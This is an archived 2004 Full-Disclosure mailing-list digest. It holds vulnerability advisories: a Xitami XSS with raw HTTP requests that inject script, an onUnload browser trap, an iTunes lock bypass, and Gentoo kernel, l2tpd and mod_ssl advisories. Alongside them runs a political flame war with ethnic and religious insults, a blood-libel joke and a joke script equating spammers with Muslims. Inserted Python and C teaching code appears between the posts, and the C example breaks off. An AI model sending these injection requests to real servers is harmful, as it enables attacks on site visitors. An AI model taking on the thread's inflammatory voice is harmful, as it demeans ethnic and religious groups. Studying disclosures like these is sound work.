Re: [Full-Disclosure] Hacking Challenge?

2004-07-22 Thread a

- Original Message - 
From: "Youssef JAD" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, July 21, 2004 2:32 PM
Subject: Re: [Full-Disclosure] Hacking Challenge?


> Did you know that the statistics say that UNIX/Linux systems are more
> vulnerable than Windows 2003 Servers ?
> That's the reality, and you need to stick with it ;)

maybe i am feeding a troll, but i think that your statement is required to be backed 
up with some statistics and even they can be made to say anything so somehow backed up 
with impartial ones with a source that can be cross checked ! otherwise such 
statements do not carry any weight and are not the reality

-aditya 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread J.A. Terranson

On Thu, 22 Jul 2004, Rafel Ivgi, The-Insider wrote:

> You stupid man, how can you say that?!
> You know how it is to live in Israel?

I don't give a sh!t what it's like to live in Israel.  You don't like the
violence, then either work to stop it, or move.

> To go up on a bus hoping not to be bombed. Hoping every day that your
> sister, mother and father will not be bombed by terrorists. Living in
> fear knowing today when you will eat in that restaurant you may not go
> back home ?!

I know *exactly* what that's like now.  And it's because we support your
little country's killing regime that I am the recipient of that knowledge.
Because we have been stupid enough to stick our noses into your (and the
palestinians) dirty little war, we have become combatants, and by
extension, targets.  So now I too have to worry about the very same things
you do.

> to pay for your university high payments and high taxes
> because all of the country's cash is going for security.

I've got news for you Rafel: I have OUTRAGEOUSLY high taxes (48%) too.
Also because of  "all of the country's cash is going for
security"!


> I hate people who talk when they know nothing. Come live in Israel for 6
> month, lets see who is right, who is the murderer, lets see if you will
> even survive. Even my math tutor was murdered at a bombing, my sister
> got away by 2 minutes...you CANT IMAGINE how it is.

I don't want to live in Israel for 6 months, and I could care less how
awful it is: your two countries have decided to kill each other off - so
go do it.  But leave me out of it.  You want to die?  Do it on your own.
Don't demand that I pay for your weapons.  And while we're on that topic,
since I DO pay for your frigging weapons, you have ZERO right to
bitch that YOUR taxes are too high!  So, should we just raise the US
taxes a little more, to ease your burden?  What gives you the right
to demand that I lower YOUR taxes?

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?



Re: [Full-Disclosure] RE: mi2g - fud, lies and libel

2004-07-22 Thread a
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> - --Tuesday, Thor Larholm [EMAIL PROTECTED] wrote to [EMAIL PROTECTED]


please don't spam the lists with all these useless info!



Re: [Full-Disclosure] A Popup! In Mozilla!

2004-07-22 Thread Szilveszter Adam
a wrote:
> does it work with the latest version of mozilla ? 1.7 / 1.7.1 ?

Of course it does. Why shouldn't it?

Sz.


Re: [Full-Disclosure] [OT] The Middle East Conundru

2004-07-22 Thread Martin Wasson
AMEN!  The argument con mucho gusto is refreshing, but outside the scope by a 
longshot.  It does, however, give me an idea.  What if we could get the Philistines 
and the Israelis to channel that anger into systematically bombing spammers into 
extinction?  H?  We could paint one of those swirling deals on an AWACS disc, 
hypnotize them all, call something like this:

spammers == infidels == muslims

while [ spammers -gt 0 ]
do
killall -9 spammers
done

The code may not be accurate, but you get the idea.  Sounds like a win-win, huh?

SMARTACVS

>>Instead of Full Disclosure [OT] 
>>How about sending it to a list that cares?
>>I don't read this list to get political insight.  I don't read it to
>>get religious discussions. 
>>Call me small minded, call me a zealot, whatever it is you call me;
>>try, just try, to have it have a shred of security related to it.
>>Hopefully we can now return to our regularly scheduled _security_list.



[Full-Disclosure] Web Site Responsibility, we'll help!

2004-07-22 Thread sans8732
http://isc.sans.org/diary.php?date=2004-06-25

http://weblog.infoworld.com/foster/2004/07/17.html#a128

"From a consumer perspective, you'd like to see a Better Business
Bureau of the Internet where you can go find who has the best
security, but we're just not there yet," says Marcus Sachs, Director
of the Internet Storm Center of the SANS Institute. The compromised
websites -- which he says included a number of well known sites but
not, as rumored, biggies like eBay -- really aren't in a position to
identify themselves. "Culturally that's just not acceptable behavior
right now, and it would put the website at a great competitive
disadvantage. And it could expose the Internet to something akin to
the malpractice lawsuits you see in the medical field, and that could
derail everything."


   Well known sites aren't in a position to identify themselves
   and take responsibility for their servers?  Here, courtesy of
   SANS, let me help them...




Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread roman . kunz
at least lockheed martin will earn a hell lot of money and... hey, they 
are paying taxes in the US too. BUT sorry, i forgot, they have 
tax-reduction (check their product catalogue 
http://www.lockheedmartin.com/wms/findPage.do?dsp=fec&ci=9&rsbci=0&fti=126&ti=0&sc=400 
- it's amazing how many different kind of bombs one can build). 
btw, america is the biggest war supporter in the world; do you know why?

sorry for feeding...
---

I don't want to live in Israel for 6 months, and I could care less how
awful it is: your two countries have decided to kill each other off - so
go do it.  But leave me out of it.  You want to die?  Do it on your own.
Don't demand that I pay for your weapons.  And while we're on that topic,
since I DO pay for your frigging weapons, you have ZERO right to
bitch that YOUR taxes are too high!  So, should we just raise the US
taxes a little more, to ease your burden?  What gives you the right
to demand that I lower YOUR taxes?




Re: [Full-Disclosure] Hacking Challenge?

2004-07-22 Thread Charles Heselton
> > Did you know that the statistics say that UNIX/Linux systems are more
> > vulnerable than Windows 2003 Servers ?
> > That's the reality, and you need to stick with it ;)
> 
I would have to concur with everything said after this post.  Where is
the link to the "statistics"?  What validation is there for the data? 
And if this is true..especially since linux took the #2 desktop OS
with 5% (yes 5%) of the population using it, are all/most of the
recent virii/trojans targeting unresolved Windows vulnerabilities? 
Um...I think I answered myself..1) greatest distribution, 2) most
vulnerable.

Just my 2¢.


-- 
Charlie Heselton
Network Security Engineer



Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread Daniel Hedblom
Can we please move this discussion to another forum? I will gladly join in
but not here ok? As interesting as some of the comments are this is
probably not the right venue. Give me a link and i will flame yours truly
to kingdom come!

/cheers





> at least lockheed martin will earn a hell lot of money and... hey, they
> are paying taxes in the US too. BUT sorry, i forgot, they have
> tax-reduction (check their product catalogue
> http://www.lockheedmartin.com/wms/findPage.do?dsp=fec&ci=9&rsbci=0&fti=126&ti=0&sc=400
> - it's amazing how many different kind of bombs one can build).
> btw, america is the biggest war supporter in the world; do you know why?
>
> sorry for feeding...
> ---
>
> I don't want to live in Israel for 6 months, and I could care less how
> awful it is: your two countries have decided to kill each other off - so
> go do it.  But leave me out of it.  You want to die?  Do it on your own.
> Don't demand that I pay for your weapons.  And while we're on that topic,
> since I DO pay for your frigging weapons, you have ZERO right to
> bitch that YOUR taxes are too high!  So, should we just raise the US
> taxes a little more, to ease your burden?  What gives you the right
> to demand that I lower YOUR taxes?


-- 
--Disclaimer-
The expressions in this mail are my own.

Daniel Hedblom
Network Admin Mobile +46 70-383 72 44
Nipan School District Work   +46 620-68 26 38
Sweden






Re: [Full-Disclosure] [OT] The Middle East Conundrum

2004-07-22 Thread Martin Wasson
And before the name calling begins... Yes, I admit it.  I'm an antispamite.  I don't 
need a lower interest rate on my mortgage, a bigger schwanz, kiddie porn, or valium* 
shipped to my door, and I'm mad as hell!  (*Maybe Thorazine or Haloperidol, huh Alif?  
Heh heh. jk)

Now STOP arguing about the Middle East and get back to Securitah.  You are NEVER going 
to agree.  Now speaking of Securitah, and in the spirit of FD, how's about some source 
for the WiFi DSSS/CCA DOS.

--MW 



[Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

2004-07-22 Thread Gadi Evron
|>You should prove that Israel *deliberately* massacres civilians.
| http://www.informationclearinghouse.info/article3023.htm
|>Anyway, this is a security-related mailing list and antisemitism
|>and antizionism are off topic: please stop boring us.
| Agreed.  Go away zionist troll.
Did I ever mention how I enjoy drinking the blood of Palestinian babies
in the morning?
Yes, we are all murderers, now can we please move on?
Can't a guy kill babies in peace and quiet without being flamed on FD?

Moderators: this is not only off-topic (unlike zombies sending viruses
here), this is outrageous!
How about you add the address of everyone who participated in this
thread, including me just now, to an auto-moderation rule?
This is not the place for politics, and it certainly ain't the place for
crazy zealots on any side, or antisemitism. They can come to Israel and
stand before tanks if they like, or even bomb a few Israeli babies - but
don't you think this really is going over the line in FD?
This is absolutely the last time I feel like a lamer for replying to
flamers and flaming them back off-topic when I am really really bored.
As much as I appreciate and adore the idea behind FD, it has grown out
of being usable, nearly at all.
It's a shame as the grand idea that it is, got to just be ridiculed and
instead of providing with an alternative to the big bad corporate
bugtraq, it's just a kiddies play ground.
A list so big must be moderated. Can't there be a Full Disclosure list
where every on-topic email, no matter who would hate it, gets through?
Even if it is about how much Symantec isn't serious, for example? Or a
competitor releasing a patch? (did I get all the normal anti-bugtraq
claims?)
Can't it be professional rather than just a venting ground for those who
find it difficult to think faster than one mile an hour?
Note: Fine, keep this list the way it is - you already showed you won't
budge from that, I want another list which can serve an actual purpose
behind the ideology other than bogging bandwidth.
I want our ideology to be respected and successful. Not a waste of time.
Open source, Linux, etc. do so well in-spite of the multi-billion $$$
fight against them, and yet all we of the security world have is FD in
its current form.
Gadi Evron.


Re: [Full-Disclosure] [OT] The Middle East Conundrum

2004-07-22 Thread J.A. Terranson

On Thu, 22 Jul 2004, Martin Wasson wrote:

> And before the name calling begins... Yes, I admit it.  I'm an
> antispamite.  I don't need a lower interest rate on my mortgage, a
> bigger schwanz, kiddie porn, or valium* shipped to my door, and I'm mad
> as hell!  (*Maybe Thorazine or Haloperidol, huh Alif?  Heh heh. jk)

Hey, Marto.  This is a *SECURITY LIST*.  Kill the off topic posts, ok?

> --MW

:-)

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?



[Full-Disclosure] Re: mi2g - fud, lies and libel

2004-07-22 Thread Thor
> >including one clear hoax titled:  "Wendy's Drive-up Order System
> >Information Disclosure."

That was a hoax?  Whadda ya know... And all this time I was waiting for
mi2g's damage assessment follow-up.  I was sure we'd see a multi-billion
dollar estimate in global damages by such an atrocious implementation of a
drive-up ordering system.  What if someone saw an Atkin's family member
ordering French Fries from a Wendy's?  Or, heaven forbid, something that
actually had a bun??  That alone is worth millions, I'm sure.

But alas, that is why all good security people go to Burger King.  After
all, they're the ones with Spidey Sense.

T



Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

2004-07-22 Thread Raymond Morsman
Quoting Gadi Evron <[EMAIL PROTECTED]>:

> Moderators: this is not only off-topic (unlike zombies sending
> viruses
> here), this is outrageous!

You are off-topic too.

The discussion whether FD should be moderated has been around forever,
in the hardest times.

This is an unmoderated list; it's not going to change the rules just
because you don't like the message. It merely is the trade-off of total
freedom of speech, which this list tries to maintain.


Raymond.

P.S. Remember: just because you can't hear them it doesn't mean the
thoughts are there. It's better to know your opponent than having a
secret enemy.



[Full-Disclosure] Re: OFF TOPIC: antisemitic troll

2004-07-22 Thread Feher Tamas
Anti-semites should not use the Internet, because TCP and UDP are 
the protocols of the elders of zion



Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

2004-07-22 Thread Gadi Evron
Raymond Morsman wrote:
| Quoting Gadi Evron <[EMAIL PROTECTED]>:
|
|
|>Moderators: this is not only off-topic (unlike zombies sending
|>viruses
|>here), this is outrageous!
|
|
| You are off-topic too.
I agree, I stated as much.
| The discussion whether FD should be moderated has been around forever,
| in the hardest times.
Indeed. I am talking about Full Disclosure as an ideology, not this list.
| This is an unmoderated list; it's not going to change the rules just
| because you don't like the message. It merely is the trade-off of total
| freedom of speech, which this list tries to maintain.
Wrong, it is a mailing list for total freedom of speech for security.
Why not do that? If not here, somewhere else. Is all I am saying.
The message of FD is important. I only wish it was serious.
| P.S. Remember: just because you can't hear them it doesn't mean the
| thoughts are there. It's better to know your opponent than having a
| secret enemy.
:)
Gadi Evron.


Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

2004-07-22 Thread Harlan Carvey
Raymond,

> It merely is the trade-off of total
> freedom of speech, which this list tries to
> maintain.

I agree with you on that.  One would hope that people
would realize that with free speech (and other
freedoms) comes responsibility...or at the very least,
observe some modicum of courtesy.  However, that very
little bit seems to be far too much to expect.  

Consider this...this is a public list and people will
knowingly post off-topic.  Sometimes they'll even say,
"hey, this is off topic".  Now, what would happen if
you were sitting around having a couple of beers w/
your buddies and a friend of yours walked up and just
started talking about something that had nothing
whatsoever to do with what you and your buds were
talking about?  Would you be the one to do that to
your friends?  How about a group of strangers?



Re: [Full-Disclosure] IE

2004-07-22 Thread Pablo
Eyh!!! There are a lot of people that think that Israel deliberately
massacres civilians, with their bombs and IDF. 
That is a fact. And they are doing that I believe.



- Original Message -
From: "whiplash" <[EMAIL PROTECTED]>
To: <>
Sent: Wednesday, July 21, 2004 7:36 PM
Subject: RE: [Full-Disclosure] IE


> J.A. Terranson wrote:
>
> > Any country that deliberately massacres civilians is, by definition,
> > guilty of genocide.
>
> You should prove that Israel *deliberately* massacres civilians.
> On the other side, anyone can easily demonstrate that Hamas and the so
> called Al Qaeda *deliberately* massacres civilians.
>
> Anyway, this is a security-related mailing list and antisemitism
> and antizionism are off topic: please stop boring us.
>


[Full-Disclosure] XSS in Xitami testssi.ssi

2004-07-22 Thread [EMAIL PROTECTED]
Xitami Imatix testssi.ssi XSS
=============================

Xitami is an easy to use and open source webserver, running on several
platforms.

What?
=====

Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which delivers
a website with the content of several SSI-variables.
Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no (sufficient)
content checking is done. The content of these variables is delivered by the
webbrowser, and therefore can be manipulated by the user.

How?
====

Telnet (don't netcat!) to port 80:

GET /testssi.ssi HTTP/1.1
Host: localhost
User-Agent: PLEASE CLICK HERE
Connection: close

GET /testssi.ssi HTTP/1.1
Host: alert("Please click at \"PLEASE CLICK HERE\"")
User-Agent: PLEASE CLICK HERE
Connection: close

Misc:
=====
This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt
Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF
Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF
Version: 2.5c1 on Windows platform  others not tested
Vendor: www.imatix.com
Date: 22.07.2004
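
The unescaped echo of HTTP_USER_AGENT and HTTP_REFERER described in the advisory above, shown next to the escaped form and a check for raw reflection. This is an added example, not part of the original post and not Xitami's code; the page template, function names and sample request are constructed for illustration.

```python
import html

# Constructed stand-in for a test page that echoes request-derived
# variables, as the advisory describes /testssi.ssi doing. Not Xitami's code.
FIELDS = ("HTTP_HOST", "HTTP_USER_AGENT", "HTTP_REFERER")
ROW = "<tr><td>{name}</td><td>{value}</td></tr>"
METACHARS = set("<>\"'&")


def parse_request(raw: bytes) -> dict:
    """Turn raw request headers into CGI-style HTTP_<NAME> variables."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    env = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            key = "HTTP_" + name.strip().upper().replace("-", "_")
            env[key] = value.strip()
    return env


def render(env: dict, escape: bool) -> str:
    """Build the test page; escape=False reproduces the reported behaviour."""
    rows = []
    for name in FIELDS:
        value = env.get(name, "")
        if escape:
            # Output encoding for HTML body/attribute context.
            value = html.escape(value, quote=True)
        rows.append(ROW.format(name=name, value=value))
    return "<html><body><table>\n" + "\n".join(rows) + "\n</table></body></html>\n"


def reflected_unescaped(page: str, env: dict) -> list:
    """Variables whose value contains HTML metacharacters and appears verbatim."""
    return sorted(
        name for name, value in env.items()
        if METACHARS & set(value) and value in page
    )


# Constructed sample request; the markup is a harmless marker.
SAMPLE_REQUEST = (
    b"GET /testssi.ssi HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"User-Agent: <i id=\"constructed\">PLEASE CLICK HERE</i>\r\n"
    b"Referer: http://example.invalid/?q=\"><b>constructed</b>\r\n"
    b"Connection: close\r\n\r\n"
)

if __name__ == "__main__":
    env = parse_request(SAMPLE_REQUEST)
    for label, escape in (("unescaped", False), ("escaped", True)):
        page = render(env, escape)
        print(label, "->", reflected_unescaped(page, env) or "no raw reflection")
```
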



[Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href

2004-07-22 Thread Rudolf Polzer
WARNING: please open a new browser instance for it.

Try http://www.informatik.uni-frankfurt.de/~polzer/rbiclan/location

The page is SUPPOSED to prevent going to somewhere else by changing
the URL back in onUnload (even that is already a reason to disable
JavaScript).

The interesting part is: depending on browser, you see different bugs.

Konqueror: an endless loop of alert boxes, seems to have crashed GNOME
(killing konqueror did not make GNOME usable).

Mozilla, Netscape 7 or Firefox: almost works correctly. Except for two
small bugs: View source shows the source of Google or where you TRIED
to go to, while you SEE the unload-trap page. The other bug: when you
close the browser window, onUnload is executed TWICE (you see two
alert boxes, with the number increasing) and the new page is loaded,
but not displayed. But the view-source bug somehow looks suspicious.
Do other parts of Mozilla think it was another website too?

IE (according to someone on IRC, not verified by me): seems to work
perfectly. For one time. Sometimes it goes to google, displays Google,
but shows the www.informatik.uni-frankfurt.de URL in the location bar.
Entering a search expression then uses the wrong domain name. Could
perhaps be used for reading content from "foreign" web sites, didn't
try.

Netscape 4: seems to work perfectly, no view-source bug or similar.
Until you close the browser window, where it becomes an endless alert
loop.

Opera: works perfectly, no bugs found. Except for that this is evil.

Links2: does not support onUnload (good thing!), therefore seems not
to be vulnerable. However, do not expect a browser that crashed on
"var i = 203; ''.charAt(i);" where 203 was a "magic number" and whose
source has variables and comments in Czech only. It took them long to
fix that bug I reported, but at least they finally did it. Even
though, that made me change to w3m.

Except for IE no "big holes" seem to be possible with that. However,
it proves that onUnload is evil (we already know that) and perhaps
shows new, perhaps unknown until now, browser bugs that may lead to
something exploitable. Have fun!



Re[2]: [Full-Disclosure] IE

2004-07-22 Thread partysan_FFF
P> Eyh!!! There are a lot of people that think that Israel deliberately
P> massacres civilians, with their bombs and IDF. 
P> That is a fact. And they are doing that I believe.

Guys, lets try and not turn this SECURITY mailing list into a
political debate group.  There are plenty of forums for that all over
the web.  If you want to discuss politics, you are very welcome to do
so, but please do it in the appropriate places and not this list.

Thank you.




[Full-Disclosure] [ GLSA 200407-16 ] Linux Kernel: Multiple DoS and permission vulnerabilities

2004-07-22 Thread Tim Yamin
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200407-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
 Title: Linux Kernel: Multiple DoS and permission vulnerabilities
  Date: July 22, 2004
  Bugs: #56171, #56479
ID: 200407-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis

Multiple permission vulnerabilities have been found in the Linux
kernel, allowing an attacker to change the group IDs of files mounted
on a remote filesystem (CAN-2004-0497), as well as an issue in 2.6
series kernels which allows /proc permissions to be bypassed.
A context sharing vulnerability in vserver-sources is also handled by
this advisory as well as CAN-2004-0447, CAN-2004-0496 and
CAN-2004-0565. Patched, or updated versions of these kernels have been
released and details are included along with this advisory.
Background
==
The Linux kernel is responsible for managing the core aspects of a
GNU/Linux system, providing an interface for core system applications
as well as providing the essential structure and capability to access
hardware that is needed for a running system.
Affected packages
=
-------------------------------------------------------------------
     Kernel                 /  Unaffected          /  Remerge
-------------------------------------------------------------------
  1  aa-sources                *>= 2.4.23-r2          YES
                               >= 2.6.5-r5            YES
  2  alpha-sources             >= 2.4.21-r9
  3  ck-sources                *>= 2.4.26-r1          YES
                               >= 2.6.7-r5            YES
  4  compaq-sources            >= 2.4.9.32.7-r8
  5  development-sources       >= 2.6.8_rc1
  6  gentoo-dev-sources        >= 2.6.7-r8
  7  gentoo-sources            *>= 2.4.19-r18
                               *>= 2.4.20-r21
                               *>= 2.4.22-r13
                               *>= 2.4.25-r6
                               >= 2.4.26-r5
  8  grsec-sources             >= 2.4.26.2.0-r6
  9  gs-sources                >= 2.4.25_pre7-r8
 10  hardened-dev-sources      >= 2.6.7-r2
 11  hardened-sources          >= 2.4.26-r3
 12  hppa-dev-sources          >= 2.6.7_p1-r2
 13  hppa-sources              >= 2.4.26_p6-r1
 14  ia64-sources              >= 2.4.24-r7
 15  mm-sources                >= 2.6.7-r6
 16  openmosix-sources         >= 2.4.22-r11
 17  pac-sources               >= 2.4.23-r9
 18  planet-ccrma-sources      >= 2.4.21-r11
 19  pegasos-dev-sources       >= 2.6.7-r2
 20  pegasos-sources           >= 2.4.26-r3
 21  ppc-sources               >= 2.4.26-r3
 22  rsbac-sources             >= 2.4.26-r3
 23  rsbac-dev-sources         >= 2.6.7-r2
 24  selinux-sources           >= 2.4.26-r2           YES
 25  sparc-sources             >= 2.4.26-r3
 26  uclinux-sources           *>= 2.4.26_p0-r3
                               >= 2.6.7_p0-r2
 27  usermode-sources          *>= 2.4.24-r6
                               *>= 2.4.26-r3
                               >= 2.6.6-r4
 28  vserver-sources           >= 2.4.26.1.28-r1
 29  win4lin-sources           *>= 2.4.26-r3
                               >= 2.6.7-r2
 30  wolk-sources              *>= 4.9-r10
                               *>= 4.11-r7
                               >= 4.14-r4
 31  xbox-sources              *>= 2.4.26-r3
                               >= 2.6.7-r2
 32  mips-sources              Vulnerable!
 33  vanilla-sources           Vulnerable!
-------------------------------------------------------------------

[Full-Disclosure] [ GLSA 200407-17 ] l2tpd: Buffer overflow

2004-07-22 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200407-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: l2tpd: Buffer overflow
  Date: July 22, 2004
  Bugs: #53009
ID: 200407-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in l2tpd could lead to remote code execution. It is
not known whether this bug is exploitable.

Background
==

l2tpd is a GPL implementation of the Layer 2 Tunneling Protocol.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  net-dialup/l2tpd   < 0.69-r2   >= 0.69-r2

Description
===

Thomas Walpuski discovered a buffer overflow that may be exploitable by
sending a specially crafted packet. In order to exploit the vulnerable
code, an attacker would need to fake the establishment of an L2TP
tunnel.

Impact
==

A remote attacker may be able to execute arbitrary code with the
privileges of the user running l2tpd.

Workaround
==

There is no known workaround for this vulnerability.

Resolution
==

All users are recommended to upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=net-dialup/l2tpd-0.69-r2"
# emerge ">=net-dialup/l2tpd-0.69-r2"

References
==

  [ 1 ] CAN-2004-0649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0649
  [ 2 ] Full Disclosure Report
http://seclists.org/lists/fulldisclosure/2004/Jun/0094.html

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200407-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

2004-07-22 Thread Maarten
On Thursday 22 July 2004 13:07, Harlan Carvey wrote:

> Consider this...this is a public list and people will
> knowingly post off-topic.  Sometimes they'll even say,
> "hey, this is off topic".  Now, what would happen if
> you were sitting around having a couple of beers w/
> your buddies and a friend of yours walked up and just
> started talking about something that had nothing
> whatsoever to do with what you and your buds were
> talking about?  Would you be the one to do that to
> your friends?  How about a group of strangers?

Except that in that social context you cannot really say there is no 
moderation.  Moderation will not be official, sure, but body language, 
awkward looks and maybe a wisecrack or two will most of the time quickly shut 
up that person.  Or they will continue their conversation in a smaller 
circle, all things that are impossible or at least difficult to do on a ML. 
On a mailinglist you can continue off-list, but that is a one-to-one 
conversation, not a fork like you can have in your bar scenario.
Also, if the guy won't stop jabbing, you can all start to leave and continue 
elsewhere.  This doesn't happen on mailinglists, or at the very least it is a 
process that takes months to complete, instead of seconds.

To steer a little bit back to on-topic, can we conclude that all computer 
systems in Israel and the surrounding Palestine territories are insecure ?
Because, since all real security begins with _physical_ security, one can 
easily argue that all those systems are notoriously insecure.  ;-)

Maarten

-- 
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER



RE: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread Todd Towles
Sounds like they should have configured that page a bit different...made it
run under a little less access...or said I say..it is a mis-configuration.
=)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dan Duplito
Sent: Wednesday, July 21, 2004 6:37 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net

> nicolas vigier <[EMAIL PROTECTED]> wrote:
>
> It's not a mis-configuration, this does not allow you to look at any
> secret file, only the files that the user nobody can read.

well, user "nobody" has shell access (/bin/sh) and is allowed read access to
/etc/passwd file and probably other system files as well.

i'm wondering if the discoverer (Alexander) already informed the authors of
the app...



[Full-Disclosure] Physical access exploit: Apple iTunes Visualiser disables screen lock

2004-07-22 Thread Adam Q
The full-screen Apple iTunes Visualiser currently disables the screen 
lock timer on both Mac & PC.

Synopsis:
This is a physical access security concern at present since anybody who 
uses the iTunes Visualiser in full-screen mode is essentially leaving 
their PC unlocked for that duration. Since many people leave the 
Visualiser on in office or POS situations this leads to a computer that 
can easily be accessed as the local user.

Suggested workaround:
Never leave a computer running iTunes Visualiser in full-screen mode 
unattended. Never deploy a computer with iTunes installed in a POS 
situation, and carefully consider the ramifications on the IT Security 
Policy in an office environment.

Recommended action:
Have the default be to lock the screen after the required time elapsed 
(exactly as if the screensaver became enabled) and have a preference to 
disable screen locking if the user wishes. Most users (and IT 
departments) would assume if they had screen locking enabled for their 
screensaver that they would be safe.


iTunes is a registered trademark of Apple Computer Corp.
---
Adam Q Salter
[EMAIL PROTECTED]


[Full-Disclosure] [ GLSA 200407-18 ] mod_ssl: Format string vulnerability

2004-07-22 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200407-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: mod_ssl: Format string vulnerability
      Date: July 22, 2004
      Bugs: #57379
        ID: 200407-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A bug in mod_ssl may allow a remote attacker to execute arbitrary code
when Apache is configured to use mod_ssl and mod_proxy.

Background
==

mod_ssl provides Secure Sockets Layer encryption and authentication to
Apache 1.3.

Affected packages
=

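-------------------------------------------------------------------
     Package           /   Vulnerable   /               Unaffected
-------------------------------------------------------------------
  1  net-www/mod_ssl       <= 2.8.18                     >= 2.8.19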

Description
===

A bug in ssl_engine_ext.c makes mod_ssl vulnerable to a ssl_log()
related format string vulnerability in the mod_proxy hook functions.

Impact
==

Given the right server configuration, an attacker could execute code as
the user running Apache, usually "apache".

Workaround
==

A server should not be vulnerable if it is not using both mod_ssl and
mod_proxy. Otherwise there is no workaround other than to disable
mod_ssl.

Resolution
==

All mod_ssl users should upgrade to the latest version:

# emerge sync

# emerge -pv ">=net-www/mod_ssl-2.8.19"
# emerge ">=net-www/mod_ssl-2.8.19"

References
==

  [ 1 ] mod_ssl Announcement
http://marc.theaimsgroup.com/?l=apache-modssl&m=109001100906749&w=2

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200407-18.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0



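The GLSA above describes a format string bug reached through a printf-style logging call. The following is an added illustration of that bug class and its usual fix, not code from mod_ssl or from the advisory; `demo_log`, `count_directives` and `log_untrusted` are hypothetical names, and the sample message is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* GCC/Clang: mark the logger printf-like so that -Wformat-security can
 * flag call sites that pass a non-literal format string. */
#if defined(__GNUC__)
#define PRINTF_LIKE(f, a) __attribute__((format(printf, f, a)))
#else
#define PRINTF_LIKE(f, a)
#endif

/* Hypothetical printf-style logger standing in for a function of the
 * ssl_log() kind: whatever is passed as fmt gets interpreted. */
static int demo_log(char *out, size_t cap, const char *fmt, ...) PRINTF_LIKE(3, 4);

static int demo_log(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, cap, fmt, ap);
    va_end(ap);
    return n;
}

/* Count conversion directives in a string; "%%" is a literal percent sign.
 * Useful as an audit check on data that is about to reach a logger. */
static int count_directives(const char *s)
{
    int n = 0;

    for (; *s != '\0'; s++) {
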